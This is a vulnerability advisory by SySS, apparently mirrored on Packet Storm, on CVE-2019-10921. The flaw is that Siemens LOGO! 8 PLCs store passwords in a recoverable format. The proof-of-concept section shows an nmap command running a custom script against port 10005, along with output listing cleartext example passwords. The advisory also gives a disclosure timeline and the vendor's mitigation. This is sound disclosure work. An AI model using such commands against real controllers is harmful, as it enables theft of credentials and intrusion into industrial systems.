exploit the possibilities

Siemens LOGO! 8 Recoverable Password Format

Siemens LOGO! 8 Recoverable Password Format
Posted May 29, 2019
Authored by Matthias Deeg, Manuel Stotz

Due to storing passwords in a recoverable format on Siemens LOGO! 8 PLCs, an attacker can gain access to configured passwords as cleartext.

tags | exploit
advisories | CVE-2019-10921
MD5 | b5aed95f8320a2434b4a7b43717410e3

Siemens LOGO! 8 Recoverable Password Format

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-014
Product: LOGO!
Manufacturer: Siemens
Affected Version(s): LOGO! 8 (all versions)
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03
Vulnerability Type: Storing Passwords in a Recoverable Format (CWE-257)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-04-04
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)
Public Disclosure: 2019-05-29
CVE Reference: CVE-2019-10921
Authors of Advisory: Manuel Stotz (SySS GmbH), Matthias Deeg (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Siemens LOGO! is a programmable logic controller (PLC) for small
automation tasks.

The manufacturer describes the product as follows (see [1]):

"Simple installation, minimum wiring, user-friendly programming: You can
easily implement small automation projects with LOGO!, the intelligent
logic module from Siemens. The LOGO! Logic Module saves space in the
control cabinet, and lets you easily implement functions, such as
time-delay switches, time relays, counters and auxiliary relays. "

Due to storing passwords in a recoverable format on LOGO! 8 PLCs, an
attacker can gain access to configured passwords as cleartext.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH found out that passwords are stored in a recoverable format on
LOGO! 8 PLCs.

Thus, if an attacker finds a way to retrieve this password data, for
instance exploiting the security vulnerabilities described in the SySS
security advisories SYSS-2019-012 [2] and SYSS-2019-013 [3], direct
access to cleartext passwords is given.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS GmbH could successfully extract sensitive data such as configured
passwords as cleartext from a LOGO! 8 using a developed Nmap script.

The following Nmap output exemplarily shows extracting cleartext
password data from a LOGO! 8 PLC:

$ nmap -p 10005 --script slig.nse 192.168.10.112
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 17:21 CEST
Nmap scan report for 192.168.10.112
Host is up (0.00044s latency).

PORT STATE SERVICE
10005/tcp open stel
| slig: Gathered Siemens LOGO!8 access details and passwords
| User: LSCUser
| Password: S3cret1
| Enabled: True
| User: AppUser
| Password: S3cret2
| Enabled: True
| User: WebUser
| Password: S3cret3
| Enabled: True
| User: TDUser
| Password: S3cret4
| Enabled: True
| Protection: Password
| Program password: SECRET
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

A successful attack against a LOGO! 8 extracting all configured
passwords is demonstrated in our SySS PoC video [7].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

In the publicly released Siemens Security Advisory SSA-542701 [3],
the manufacturer Siemens recommends to apply a defense-in-depth concept,
including protection concept outlined in the system manual, as a
mitigation for reducing the risk of the described security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-04: Vulnerability reported to manufacturer
2019-04-04: Manufacturer confirms receipt of security advisory and
asks for referenced Nmap script
2019-04-04: SySS provides PoC Nmap script
2019-05-14: Public release of Siemens Security Advisory SSA-542701
2019-05-29: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Siemens LOGO!
https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html
[2] SySS Security Advisory SYSS-2019-012
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-012.txt
[3] SySS Security Advisory SYSS-2019-013
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-013.txt
[4] SySS Security Advisory SYSS-2019-014
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-014.txt
[5] Siemens Security Advisory SSA-542701
https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf
[6] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[7] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"
https://youtu.be/TpH4EABGYCs

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Manuel Stotz of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAlztdr8ACgkQ2aS/ajSt
TasxbQ/+PJBnR7LHclINEMabNhgqI5k98QsHLesp+++pKtyJoBm/9znzMLkv9rUw
nt8uRC2qlObbPMmnEMGSHGZU9wYATyo1e8jiv4X9Nxqa6XxuhApXa7un6ExDkrCm
PDxQ0L8WmH6/gkpRqoijrhk+5n16sG5BtMRi/fwTHtz1GvpBAMIpuR+ZbgLmlqjW
V2Ta/0ZMEUw7ANSL3WwPZa9uowuRfV6hAUWPRz5aP4KcxkoasE2WBz81kmc3GEYl
cJ40pqE8hOTBC+fCgUElSLbmfr4tbDJw3u3KayAJA27Qu+IhBvrwEVGBsDb+MJ95
wd553soH6ehILtthKVPrUU53jZWQrOjmqbu8mLG9oCAoaVIR9gsxnxJ5NohoIH+I
vkvMo7RygY7GrBeWqPAZWm4N790PA3miKhDUrEgTJtTVb5bZ+h362K0AQD9PauAu
nbR9Ui8ZDqr+64tCP00C2YkoMZKSkxdnwRdIEn/njcDfKgMi5JBbBQwRX9JiUOly
b1QT+X9iaMEdIqzYmSMchEm4/FW5yox+Q0nFjkPiE/uGUmZFDKxdQr8bQcHisWXi
HcecHC6aknlJwkhHduK4meC/935c1qcaR9DA3O18JdqaonlaU1PezkivK6Yy80u4
XYUJ6umZh1gw/Ghx4+EorJqKnoZtaZWGVyTk0JKmIXa+AvWZV5w=
=cc0p
-----END PGP SIGNATURE-----

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    1 Files
  • 17
    Nov 17th
    3 Files
  • 18
    Nov 18th
    22 Files
  • 19
    Nov 19th
    17 Files
  • 20
    Nov 20th
    15 Files
  • 21
    Nov 21st
    16 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close